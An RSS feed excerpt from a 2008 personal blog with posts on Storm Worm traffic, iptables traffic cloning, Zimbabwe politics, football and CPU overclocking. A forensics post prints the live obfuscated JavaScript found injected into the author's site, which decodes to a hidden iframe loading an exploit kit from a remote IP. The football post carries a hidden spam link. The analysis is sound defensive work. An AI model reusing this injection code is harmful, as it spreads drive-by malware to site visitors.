		<pubDate>Mon, 21 Jul 2008 16:52:25 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>
		<category><![CDATA[IT-Security]]></category>
		<category><![CDATA[storm worm pattern traffic bootstrapping analysis]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=233</guid>
		<description><![CDATA[Thorsten Holz kindly offered to blog my findings in Storm Worm Traffic for a larger readership. Maybe there will be some ideas on the mentioned patterns&#8230;
]]></description>
			<content:encoded><![CDATA[<p><a href="http://pi1.informatik.uni-mannheim.de/index.php?inc=staffhome.php3&#038;user_id=28">Thorsten Holz</a> kindly offered to <a href="http://honeyblog.org/archives/196-Interesting-Pattern-in-Storm-Worm-Traffic.html">blog my findings in Storm Worm Traffic</a> for a larger readership. Maybe there will be some ideas on the mentioned patterns&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/07/interesting-pattern-in-storm-worm-traffic/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Forensics: Anatomy of a Drive-by-Download Attack</title>
		<link>http://www.bjou.de/blog/2008/07/forensics-anatomy-of-a-drive-by-download-attack/</link>
		<comments>http://www.bjou.de/blog/2008/07/forensics-anatomy-of-a-drive-by-download-attack/#comments</comments>
		<pubDate>Sat, 05 Jul 2008 13:38:36 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>
		<category><![CDATA[IT-Security]]></category>
		<category><![CDATA[deobfuscation]]></category>
		<category><![CDATA[drive by download]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=232</guid>
		<description><![CDATA[The other day I checked a rarely used website of mine for its its source, where I found some suspicious code. It seemed to be some kind of malicious iframe code for drive-by downloads, so I started my investigation on it. Be alarmed: I will NOT censor any of that code, so be sure NOT [...]]]></description>
			<content:encoded><![CDATA[<p>The other day I checked a rarely used website of mine for its its source, where I found some suspicious code. It seemed to be some kind of malicious iframe code for drive-by downloads, so I started my investigation on it. <strong>Be alarmed</strong>: I will <strong>NOT</strong> censor any of that code, so be sure <strong>NOT</strong> to visit these websites unless you know what you are doing.<br />
<span id="more-232"></span><br />
Now here is the obfuscated JavaScript code:</p>
<p><code>&lt;!-- Nerzul --&gt;&lt;script type="text/javascript"><br />
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');<br />
&lt;/script&gt;</code></p>
<p>which decodes to</p>
<p><code>&lt;iframe src="http://58.65.235.41/llll/stds/index.php?sid=1" width=1 height=1 style="visibility:hidden;position:absolute"&gt;&lt;/iframe&gt;</code></p>
<p>Just to be on the safe side, I used a virtual machine, <a href="http://www.sandboxie.com/">Sandbox Technologies</a> and Wireshark to visit the website and capture the packets. After the HTTP GET request on that site, a &#8220;<em>GET /llll/stds/go.php?sid=1 HTTP/1.1\r\n</em>&#8221; was executed, which forwarded to &#8220;<em>GET /llll/ts/index.php HTTP/1.1\r\n</em>&#8220;. This request occurred every 24 seconds. Following every single request, I got a lof of &#8220;Continuation or non-HTTP Traffic&#8221;, meaning there were some packets on port 80 without the HTTP header. There was a lot of HTTP-data like &#8220;<em>Data: 783932494B4148407542324C4E414833563358417A46484D&#8230;</em>&#8220;, so I decided to use <a href="http://chaosreader.sourceforge.net/">chaosreader</a> to gain some better understanding.<br />
I got <a href="http://www.bjou.de/blog/wp-content/uploads/jsMaliciousCodeObfuscated.txt">this interesting result</a>. In total I got a lot of these obviously heavily obfuscated data, but they did not seem to differ alot. I de-obfuscated them using <a href="http://malzilla.sourceforge.net/">malzilla</a> and did a &#8220;<em>diff</em>&#8221; on some of them:</p>
<p><code>[~/malicious]$diff exploit1 exploit2<br />
177c177<br />
<                               var fname="winSnp6O4.exe";<br />
---<br />
>                               var fname="winbtHWMzX7lmTK.exe";<br />
[02:24:01] [~/malicious]$diff exploit2 exploit3<br />
177c177<br />
<                               var fname="winbtHWMzX7lmTK.exe";<br />
---<br />
>                               var fname="winIZdWt3zQl5YEQb.exe";<br />
[02:24:06] [~/malicious]$diff exploit3 exploit4<br />
177c177<br />
<                               var fname="winIZdWt3zQl5YEQb.exe";<br />
---<br />
>                               var fname="winK6S9dnplSskzh.exe";<br />
</code></p>
<p>So we see, only the filenames changed. Moreover, when analyzing the <a href="http://www.bjou.de/blog/wp-content/uploads/jsMaliciousCodeDeobfuscated.txt">de-obfuscated JS-code</a>, it can be seen that this file includes nine different exploit vectors, including Microsoft&#8217;s <a href="http://www.microsoft.com/technet/security/Bulletin/ms06-014.mspx">MDAC</a>, <a href="http://www.securityfocus.com/bid/19030">Webview Folder Icon</a> and <a href="http://www.securiteam.com/windowsntfocus/5LP0Q2KJFU.html">DirectAnimation Heap Overflow</a> Vulnerabilities, Macromedia&#8217;s <a href="http://blogs.zdnet.com/security/?p=1189">Flash Vulnerability</a> and some more that I did not investigate.<br />
The script will start with <em>attack(1);</em>, trying to create <em>Shell Application</em> Objects for several classids and then it will create an <em>ADODB Stream</em> and save the <em>responseBody </em>received via XMLHTTP to a file with the fixed letters &#8220;win&#8221; followed by some random ones (see above). While debugging the code on my system, creating the shell application object failed (its return value was <em>null</em>), so I haven&#8217;t been able to open the stream and analyze that file.<br />
However, after failing of attack1 and attack2 (the swf exploit, the url did not ping), the other exploits were being run, but I did not go further into analysis there&#8230;</p>
<p>So now only the question remains, how that code came into the index.html pages of my website. My FTP password is rather strong, so that can&#8217;t be it and neither can social engineering or SQL Injections, as it was pure HTML without any DB backend. Waiting for an answer from my webhoster&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/07/forensics-anatomy-of-a-drive-by-download-attack/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Kämpfen, Lautern, kämpfen!</title>
		<link>http://www.bjou.de/blog/2008/05/kampfen-lautern-kampfen/</link>
		<comments>http://www.bjou.de/blog/2008/05/kampfen-lautern-kampfen/#comments</comments>
		<pubDate>Fri, 16 May 2008 06:49:11 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Spocht]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=231</guid>
		<description><![CDATA[Ein schöner Artikel bei Welt Online zur Situation des 1. FCK. Schon zwei Wochen alt, aber sehr gut lesbar und genau richtig, um zum Entscheidungsspiel am Sonntag gegen Köln aufzuheizen. Ich hoffe, ich darf diesmal wieder vor dem Weiland&#8217;schen Fernseher tanzen &#8211; oder aber ich fahr echt hoch zum Betze: Im Brauhaus, Cafe am Mark [...]]]></description>
			<content:encoded><![CDATA[<p>Ein schöner Artikel bei Welt Online zur Situation des 1. FCK. Schon zwei Wochen alt, aber sehr gut lesbar und genau richtig, um zum Entscheidungsspiel am Sonntag gegen Köln aufzuheizen. Ich hoffe, ich darf diesmal wieder vor dem Weiland&#8217;schen Fernseher tanzen &#8211; oder aber ich fahr echt hoch zum Betze: Im Brauhaus, Cafe am Mark und Hannen-Fass wird das Spiel im Großformat live übertragen.</p>
<blockquote><p>Leise sagt er [Stefan Kuntz] Sätze wie: &#8220;Der FCK ist für die Menschen wie eine alte Liebe. Wir müssen sie nur ein wenig entstauben.&#8221; Oder, etwas lauter: &#8220;Es geht doch nicht an, dass hier auf der Geschäftsstelle alle in Einzelbüros sitzen. So kommen wir nie zusammen.&#8221; Und wenn Stefan Kuntz über den drohenden Abstieg reden muss, sagt er: &#8220;Natürlich neigt sich die Waage derzeit eher in Richtung Dritte Liga. Aber das wäre auch eine Chance. Wir könnten wie beim Computer den Reset-Knopf drücken.&#8221;<br />
In Kaiserslautern hat Kuntz mit diesen Sätzen unerhörten Erfolg. Die ganze Stadt, einschließlich Bürgermeister und Uni-Präsident, redet davon, was für ein großartiger und dabei bodenständiger Kerl &#8220;der Stefan&#8221; doch sei.</p></blockquote>
<p>Link: <a href="http://www.welt.de/welt_print/article1957386/Kmpfen_Lautern_kmpfen.html">http://www.welt.de/welt_print/article1957386/Kmpfen_Lautern_kmpfen.html</a><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://kvantservice.com/">&#1082;&#1086;&#1084;&#1087;&#1102;&#1090;&#1088;&#1080;</a></font></p>
<p>Außerdem gibt es angeblich ein <a href="http://www.fck-blog.de/public-viewing-auf-dem-stiftsplatz/16-05-2008/">Public Viewing auf dem Stiftsplatz</a>!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/05/kampfen-lautern-kampfen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Howto: Copy/Tee/Clone network traffic using iptables</title>
		<link>http://www.bjou.de/blog/2008/05/howto-copyteeclone-network-traffic-using-iptables/</link>
		<comments>http://www.bjou.de/blog/2008/05/howto-copyteeclone-network-traffic-using-iptables/#comments</comments>
		<pubDate>Wed, 14 May 2008 22:51:22 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=228</guid>
		<description><![CDATA[Having to work with Netflow data for my Diploma Thesis I invested quite some time into the following challenge:
Our Routers export Cisco Netflow Data to HOST A, where we do accounting. I want to use HOST B for several Netflow-related tests. The Routers only support one target for their netflow export (as mentioned, this target [...]]]></description>
			<content:encoded><![CDATA[<p>Having to work with Netflow data for my Diploma Thesis I invested quite some time into the following challenge:<br />
Our Routers export Cisco Netflow Data to <em>HOST A</em>, where we do accounting. I want to use <em>HOST B</em> for several Netflow-related tests. The Routers <em>only support one target</em> for their netflow export (as mentioned, this target is HOST A).</p>
<p><strong>Problem: How is it possible to clone the incoming stream of packets at HOST A and forward one copy into HOST A&#8217;s userspace (for accounting applications) and the other copy to HOST B&#8217;s userspace (for testing purposes)?</strong><br />
The specific challenge is that I do not want a simple FORWARD to HOST B, but a FORWARD of a copy, so that I can work with the data on both machines. This leads to the next problem: Packets arriving at HOST B have the Destination IP address of HOST A in their IP header. We need to rewrite this IP at HOST B so that userspace applications are able to process these packets (which they are not, if the packets are not destined to HOST B&#8217;s address).</p>
<div align="center">
<a href='http://www.bjou.de/blog/wp-content/uploads/iptables_tee.jpg'><img src="http://www.bjou.de/blog/wp-content/uploads/iptables_tee.jpg" alt="" title="iptables_tee"  class="aligncenter size-full wp-image-229" /></a></div>
<p><span id="more-228"></span><br />
<strong>Note in advance</strong>: Despite all efforts this tutorial only works for connectionless udp traffic. A successful 3-way-handshake on HOST A prevents HOST B (despite IP-address rewriting) from accepting the packets in userspace. It just does not work, I appreciate any comments on that. Remember that <em>tee</em> is normally used to clone traffic to another host for passive sniffing and traffic analysis. Note as well, that even if you might want to keep this approach centralized and rewrite the packet&#8217;s IP addresses already at HOST A in the <em>POSTROUTING </em>chain, this will not work: Teed packets do not yet show up anywhere within the iptables structures to avoid interfering with the original packet&#8217;s table traversal. This is subject to change, though. Thanks to Jan Engelhardt for this information.</p>
<p>So here is how we achieve this goal (tested on Debian Etch stable):<br />
<strong>History</strong>: There used to be a <em>tee </em>option for an experimental <em>ROUTE target</em>,  patchable into iptables with <a href="http://www.netfilter.org/projects/patch-o-matic/pom-extra.html">patch-o-matic</a> (pom). This will not work on recent kernels and is deprecated!</p>
<p>This is what we will do on <strong>HOST A</strong>: Get xtables-addons from <a href="http://dev.computergmbh.de/">http://dev.computergmbh.de</a>:<br />
<code>wget http://dev.computergmbh.de/files/xtables/xtables-combined-1.5.4.1.tar.bz2</code><br />
This includes a current snapshot of iptables.</p>
<blockquote><p>Xtables-addons is the proclaimed successor to patch-o-matic(-ng). It<br />
contains extensions that were not accepted in the main Xtables<br />
package.<br />
Xtables-addons is different from patch-o-matic in that you do not have<br />
to patch or recompile either kernel or Xtables(iptables).</p></blockquote>
<p>Untar, configure, make and make install. Should you run into problems of the kind<br />
<code>warning: #warning You need either CONFIG_NF_CONNTRACK or CONFIG_IP_NF_CONNTRACK</code><br />
 change into your kernel source directory and adapt your kernel. Therefore, look for the Networking option, find the Netfilter (formerly know as ipchains) framework entry and enable the appropriate options. I also ran into problems saying<br />
<code>warning: #warning You have CONFIG_IP_NF_CONNTRACK enabled, but CONFIG_IP_NF_CONNTRACK_MARK or CONFIG_IP_NF_CONNTRACK_SECMARK are not (please enable)</code><br />
so be sure to enable these options as well in the <em>IP: Netfilter Configuration</em> section.<br />
Save your config and build a new kernel. However, this is not topic of this tutorial.<br />
Should there be other errors because of a special addon, deactivate it in the xtables-addons directory using the <em>mconfig</em> file. Be sure not to deactivate the <em>TEE</em> target, as this is the one we need. The installation success of the xtables-addons may largely depend on the kernel that is being used. If it just won&#8217;t work for you with your existing kernel, try another one. I had successful setups on 2.6.23.16 and 2.6.18.6</p>
<p>After successful installation fire the command<br />
<code>iptables -t mangle -A PREROUTING -p udp --dport 9996 -j TEE --gateway &lt;IP of HOST B&gt;</code>.<br />
This command will clone all incoming udp-packets to port 9996 in kernelspace and copy them to HOST B, where we will rewrite the IP addresses. Confirm by typing<br />
<code>iptables -t mangle -L</code><br />
This will list your rules in the <em>mangle</em> table.<br />
Should there be an error about an unknown table/target/chain, then xtables-addons did not build/install successful, probably because of some missing kernel options.</p>
<p><strong>On HOST B</strong>: You do not need xtables-addons here, but only some standard iptables version, as you only need the default DNAT target (Your kernel needs to support it however. Therefore, make sure to have the <em>IPv4 connection tracking support (required for NAT)</em> option enabled in the <em>IP: Netfilter Configuration</em> section of your netfilter kernel category).<br />
<code>iptables -t nat -A PREROUTING -p udp -d &lt;IP of HOST A&gt; --dport 9996 -j DNAT --to-destination &lt;IP of HOST B&gt;:&lt;Port&gt;</code></p>
<p>That should be it. Now test your setup. You will need three hosts: HOST A and B and another HOST C where you will generate (UDP-) packets. Get a packet generator (I used <a href="http://ip-packet.sourceforge.net/">IP-Packet</a>) and download it to HOST C. Read its documentation, create a config file and fire up your packets to <em>HOST A port 9996</em>. But first, make sure you have a listening process on both, HOST A and B running and waiting for your packets on that specific port. The easiest way will be to use netcat in udp-mode:<br />
<code>nc -ulp9996</code> on HOST A and on HOST B respective with the port used there. Fire your packets and both netcat instances should receive the UDP payload data. If only HOST A gets them, your <em>tee </em>or <em>DNAT </em>is not working. Debug yourself <img src='http://www.bjou.de/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  That&#8217;s what I need to do now, as well, because teeing seems to work perfectly fine from one host, but not from the other&#8230; Same settings, though, this is just not fair :&#8217;(</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/05/howto-copyteeclone-network-traffic-using-iptables/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Mugabe, Zimbabwe, die Wahl, die Waffen und die &#8220;An Yue Jiang&#8221;</title>
		<link>http://www.bjou.de/blog/2008/04/mugabe-zimbabwe-die-wahl-die-waffen-und-die-an-yue-jiang/</link>
		<comments>http://www.bjou.de/blog/2008/04/mugabe-zimbabwe-die-wahl-die-waffen-und-die-an-yue-jiang/#comments</comments>
		<pubDate>Mon, 21 Apr 2008 22:08:08 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Mein Tach]]></category>
		<category><![CDATA[Südliches Afrika]]></category>
		<category><![CDATA[An Yue Jiang]]></category>
		<category><![CDATA[robert mugabe]]></category>
		<category><![CDATA[simbabwe]]></category>
		<category><![CDATA[waffenlieferung]]></category>
		<category><![CDATA[wahlbetrug]]></category>
		<category><![CDATA[zimbabwe]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=226</guid>
		<description><![CDATA[ Seit meinem Besuch im August 2007 im westlichen Teil von Zimbabwe geht mir dieses Thema verständlicherweise viel näher als vorher. Nicht allein weil ich live miterleben konnte, wie das Land zu Grunde geht, sondern auch wegen der Anteilnahme, die unsere südafrikanischen Führer der Situation entgegenbrachten und wie sie uns dafür sensibilisierten (links unsere damalige [...]]]></description>
			<content:encoded><![CDATA[<p><a href='http://www.bjou.de/blog/wp-content/uploads/map2.jpg'><img src="http://www.bjou.de/blog/wp-content/uploads/map2-300x300.jpg" alt="" title="Südliches Afrika" width="300" height="300" vspace="5" padding="5" hspace="5" class="alignleft size-medium wp-image-227" /></a> Seit meinem Besuch im August 2007 im westlichen Teil von Zimbabwe geht mir dieses Thema verständlicherweise viel näher als vorher. Nicht allein weil ich live miterleben konnte, wie das Land zu Grunde geht, sondern auch wegen der Anteilnahme, die unsere südafrikanischen Führer der Situation entgegenbrachten und wie sie uns dafür sensibilisierten (links unsere damalige Reiseroute mit Endstation in Zimbabwe). Damals schon wurde hoffnungsvoll auf die kommenden Wahlen geblickt, die nun am 29.3.2008 stattfanden und bei denen allgemein gehofft wurde, dass der 84-jährige <a href="http://de.wikipedia.org/wiki/Robert_Mugabe">Robert Mugabe</a> nach 28-jähriger Amtszeit als Regierungsoberhaupt endlich abgelöst wird. Kein Zweifel besteht daran, dass er in seiner Amtszeit das Land mit diktatorischen und unmenschlichen Aktionen heruntergewirtschaftet hat &#8211; im Februar diesen Jahres hatte die Inflationsrate 100.000% überschritten. Die Touristenhochburg Zimbabwes liegt im westlichen Zipfel: Die mächtigen Victoria Falls sind nach wie vor ein beliebtes Reiseziel und sehr beeindruckend, doch auch im Touristädtchen mit dem gleichen Namen macht sich die Armut bemerkbar. An den <a href="http://flickr.com/photos/bjou/2432499120/">Tankstellen gibt es keinen Sprit</a>, Softdrinks werden in Kneipen als <a href="http://flickr.com/photos/bjou/2432495308/">Spezialität des Tages</a> gelistet (und das ist kein Scherz) und der allgemeine Trend eines jeden zimbabwischen Einwohners ist das Pilgern nach Victoria Falls, um sich dort wenigstens ein kleines Scheibchen vom Tourismus abschneiden zu können. Schlangen über hunderte Meter bilden sich morgens an einem kleinen 7-Eleven Laden, weil das Gerücht umherging, es gäbe Brot. Einheimische kommen dir alle paar Meter entgegen und wollen dir ihre geschnitzten Figuren verkaufen &#8211; nicht für Geld, sondern im Tausch gegen dein altes verschwitzes T-Shirt oder deine dreckigen Schuhe. <a href="http://www.flickr.com/photos/bjou/1105206424/" title="IMG_1434 by bjoubert, on Flickr"><img align="left"  vspace="5" padding="5" hspace="5" src="http://farm2.static.flickr.com/1026/1105206424_8bd26159c0_s.jpg" width="75" height="75" alt="IMG_1434" /></a> Rießige Hotelanlagen wie &#8220;<a href="http://flickr.com/photos/bjou/2431684929/">The Kindgom</a>&#8220;, das einst Michael Jackson gehörte, sind wie leergefegt &#8211; trotz Tourismus. Die Fressmeile im Inneren des Hotelkomplexes hat nur noch wenige Läden geöffnet und wenn man sich eine Pizza bestellen willst, muss man auf 40% seiner Toppings verzichten oder Kompromisse eingehen. Für ein Trinkgeld von einem Dollar wirst du hier zu einem Gott erklärt. Ich habe noch nie jemanden so glücklich über ein kleines Trinkgeld gesehen. Der Import vom Nachbarland Zambia geht nur stückchenweise voran. An der Grenze entstehen unglaublich lange Wartezeiten, nur als Touri darf man schnell mal vor, um die Wasserfälle von der anderen Seite zu sehen.</p>
<p>Und jetzt kam Ende März endlich die <strong>Wahl </strong>und versprach Besserung, die Oppositionspartei <em>Movement for Democratic Change</em> (MDC) hatte eine sehr gute Ausgangsposition und allem Anschein nach auch gewonnen. Allem Anschein nach? Ja, denn nach drei Wochen sind die Wahlergebnisse immernoch nicht veröffentlicht. Mugabe verlange eine erneute Auszählung, da es in einigen Gebieten Probleme bei der Wahl gab &#8211; natürlich waren das die MDC-Hochburgen. Da der Verdacht auf möglichen Wahlbetrug schon vor der Wahl (berechtigterweise) laut wurde, waren viele unabhängige Wahlbeobachter im Land. Jüngst bei den Neuauszählungen kam es hier jedoch zu <a href="http://www.rp-online.de/public/article/politik/ausland/558813/Massivem-Wahlbetrug-in-Simbabwe.html">massivem Wahlbetrug</a>, zu Gewalt, Unterdrückung und Folterung Oppositioneller in Foltercamps.</p>
<blockquote><p>Südafrikanische Zeitungen berichten unterdessen, dass Militär, Polizei, der Geheimdienst und sogar Mugabes Leibwache dringend neue Munition und neue Waffen brauchten. Mehrere Lieferungen – Hauptlieferant China &#8211; hätten storniert werden müssen, weil die Staatsbank die Rechnungen nicht habe bezahlen können.</p></blockquote>
<p>Und ohne Waffen ist schließlich keine Unterdrückung möglich. Leider jedoch ist die Staatskasse leer und ohne Geld keine Waffen. Im Endeffekt also keine Macht mehr. Doch wer Mugabe kennt, weiß, dass er sich trotz internationalem Druck keine Möglichkeit entgehen lässt, sich an seine Macht zu klammern. Waffen müssen also her, koste es was es wolle. Die &#8220;<em>An Yue Jiang</em>&#8221; ist ein chinesisches Containerschiff mit genau dieser lang ersehnten Lieferung: 70 Tonnen Waffen und Munition (laut <a href="http://www.taz.de/nc/1/archiv/digitaz/artikel/?ressort=au&#038;dig=2008%2F04%2F19%2Fa0167&#038;cHash=a01cac092e">taz</a>: 1.500 Raketen, 2.500 Mörsergranaten, fast 100 Granatwerfer und 3,5 Millionen Schuss Munition) , angeblich im Wert von 40 Millionen EURO. Damit hätte man dem Land auf ganz andere Art und Weise dienen können. Blöd auch, dass Zimbabwe keinen Hafen hat und alle möglichen Anlaufhäfen von Regierungen geführt werden, die verhindern wollen, dass diese Waffen nach Zimbabwe gelangen. So wurde die Entladung im südafrikanischen Durban verweigert und der Transport nach Zimbabwe ohnehin verboten. Abgesehen davon: </p>
<blockquote><p>
Die [deutsche] Entwicklungsbank habe dem simbabwischen Staatskonzern &#8220;Iron &#038; Steel Company&#8221; zur Errichtung eines Stahlwerks 1998 und dann noch einmal als Aufstockung im Jahr 2000 insgesamt Kredite &#8220;in zweistelliger Millionenhöhe&#8221; bewilligt, für die Simbabwe eine Staatsgarantie übernommen habe.</p></blockquote>
<p>Da Mugabe also noch Schulden in etwa der Höhe der Ladung bei der <em>deutschen Kreditanstalt für Wiederaufbau</em> (KfW) hat, hat die Entwicklungsbank eine Pfändung der Ladung erwirkt &#8211; bevor diese jedoch in Kraft treten konnte, legte das Schiff hastig wieder von Durban ab, Ziel unbekannt. Aufgetankt werden konnte vorher allerdings nicht mehr. Es darf gespannt sein, wo das Schiff wiederentdeckt wird und welchen Hafen es versucht anzulaufen. Ob Angola erreicht werden kann steht aufgrund des Spritmangels in den Sternen und ob die Ladung bei Mugabe ankommt ist mehr als fraglich, aber aufgrund der internationalen Mobilmachung und der Entladungsweigerung der südafrikanischen Transportarbeitergewerkschaft hoffentlich eher unwahrscheinlich.</p>
<blockquote><p>Nicht nur Südafrikas Mann im internationalen Bund der Transportarbeiter macht Front gegen Mugabe. Auch die 300.000 Mitglieder starke südafrikanische Transportarbeitergewerkschaft Satawu hat ihre Kollegen in der ganzen Welt aufgerufen, das chinesische Schiff zu boykottieren.</p></blockquote>
<p>Diese Nachrichten habe ich zum Anlass genommen, mir nochmal <a href="http://www.bjou.de/blog/2006/10/movie-lord-of-war-handler-des-todes/">Lord of War</a> anzuschauen. Denn immernoch aktuell:</p>
<p><strong>“While private gunrunners continue to thrive, the Worlds biggest arms suppliers are the U.S., U.K., Russia, France and China.”<br />
“They are also the five permanent members of the U.N. Security Council.”</strong></p>
<p>Quellen (soweit nicht anders angegeben):
<ul>
<li><a href="http://www.spiegel.de/politik/ausland/0,1518,548310,00.html">Mugabe erwartet Schiffsladung voller Waffen aus China</a> vom 18.4.</li>
<li><a href="http://www.spiegel.de/politik/ausland/0,1518,548537,00.html">Mugabes Waffen-Frachter auf dem Weg nach Angola</a> vom 20.4.</li>
<li><a href="http://www.spiegel.de/politik/ausland/0,1518,548710,00.html">Mugabe wartet auf das Geisterschiff</a> vom 21.4.</li>
<li><a href="http://www.spiegel.de/politik/ausland/0,1518,548798,00.html">Deutsche Förderbank jagt Mugabes Waffenschiff</a> vom 21.4.</li>
</ul>
<p><a href="http://flickr.com/photos/bjou/tags/vicfalls/">Meine Fotos von Victoria Falls in Zimbabwe</a></p>
<p><strong>Update:</strong> Die Ladung wird wohl zurückgerufen, Spiegelartikel vom 22.4.:</p>
<blockquote><p>Die &#8220;An Yue Jiang&#8221; mit ihrer Ladung aus Waffen und Munition konnte in keinem afrikanischen Hafen entladen werden, weil der internationale Verband der Transportarbeiter (ITF) überall auf dem Kontinent zu einem Boykott des Schiffes aufgerufen hatte. Heute hatte sich die letzte Hoffnung der Reederei zerschlagen: <strong>Als letztes Land weigerte sich auch Angola die Ladung zu löschen. Angolas oberster Hafendirektor Filomeno Mendonca hat den letzten möglichen Schlupfwinkel an Afrikas Küste versperrt.</strong> &#8220;Das Schiff darf keinen angolanischen Hafen anlaufen,&#8221; erklärte er in einem Interview mit Radio Luanda. Menschenrechtsgruppen und Gewerkschaften hatten davor gewarnt, die Waffen nach Simbabwe gelangen zu lassen. Dort mehren sich seit den umstrittenen Wahlen vor mehr als drei Wochen Berichte über blutige Übergriffe gegen die Opposition.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/04/mugabe-zimbabwe-die-wahl-die-waffen-und-die-an-yue-jiang/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Quadcore Q6600 Overclocking</title>
		<link>http://www.bjou.de/blog/2008/04/quadcore-q6600-overclocking/</link>
		<comments>http://www.bjou.de/blog/2008/04/quadcore-q6600-overclocking/#comments</comments>
		<pubDate>Thu, 10 Apr 2008 19:15:13 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=225</guid>
		<description><![CDATA[Weil es bei dem Intel Core2 Quad (&#8220;Kentsfield&#8221;) angeblich so einfach sein soll, hab ich es auch mal versucht und eine Übertaktung vorgenommen. Multiplikator bei 9 gelassen, FSB von 266Mhz auf 333Mhz erhöht, VCore vom Mainboard (Gigabyte P35-DS3) automatisch einstellen lassen, Rest Default. Reboot! Und schon is meine Maschine um 25% übertaktet. Von 2,4GHz auf [...]]]></description>
			<content:encoded><![CDATA[<p>Weil es bei dem Intel Core2 Quad (&#8220;Kentsfield&#8221;) angeblich so einfach sein soll, hab ich es auch mal versucht und eine Übertaktung vorgenommen. Multiplikator bei 9 gelassen, FSB von 266Mhz auf 333Mhz erhöht, VCore vom Mainboard (Gigabyte P35-DS3) automatisch einstellen lassen, Rest Default. Reboot! Und schon is meine Maschine um 25% übertaktet. Von 2,4GHz auf 3,0GHz &#8211; das war alles! Leider macht der Boxed-Lüfter dabei ein nicht all zu gutes Bild. Nach unter einer Minute Prime95 Lasttest gehen die Kerntemperaturen schon über die 80°, daher musste nun was neues her: <a href="http://www.hardwareoc.at/Scythe_Mine_Cooler_Kuehler.htm">Scythe Mine Rev B</a>. 15cm hoch, mega großes Ding, passt gerade so ins Gehäuse, kühlt aber besser. Core-Temperaturen nach 30 Minuten Prime95 Small-FFT Lasttest bei 70/73/73/70 Grad, bei Large-FFT Tests bleibt es im Schnitt bei 69°. Beim Idlen sind&#8217;s um die 38°. Unter Last trotz allem noch etwas hohe Temperaturen, aber nicht weiter tragisch. Der Q6600 in der G0 Stepping Variante ist zwar nur bis 71° offiziell quälbar, bevor gethrottled wird, allerdings ist dies die Angabe der CPU Temperatur, die etwa 10° unter der Temperatur der Kerne liegt. Everest sagt unter Last: 61°. Die Temperaturen ausgelesen habe ich mit CoreTemp und Everest Ultimate. CPU-Z sagt, dass der Rechner auf den vollen 3GHz läuft, also nicht gethrottled wurde trotz hoher Kerntemperaturen. Und stabil läuft er auch nach über einer Stunde Vollast. Passt also &#8211; oder gibts Einwände?&#8230;</p>
<p><strong>UPDATE</strong>: Nachdem ich den Rechner wieder in die Vertikale gestellt habe stiegen die Temperaturen unter Last auf einmal ins Unermessliche, yikes!! Was war passiert? <img src='http://www.bjou.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  Die Pushpins saßen wohl nicht so fest&#8230; Naja, jedenfalls sitzt der Lüfter jetzt richtig und von den oben genannten Temperaturen könnt ihr nun ruhig ein paar Grad abziehen, nach 30 Minuten Last bleibe ich jetzt bei allen Kernen unter 60° (49° CPU Temperatur), beim Idlen bin ich bei 33-38°. Besser. Dafür rasselt der Lüfter ein bissl, aber das is mir jetzt erstmal egal, jetzt hab ich kein Bock mehr, das legt sich oder hört sich hoffentlich weg <img src='http://www.bjou.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong>UPDATE</strong>: Lüfter eingeschickt und austauschen lassen <img src='http://www.bjou.de/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/04/quadcore-q6600-overclocking/feed/</wfw:commentRss>
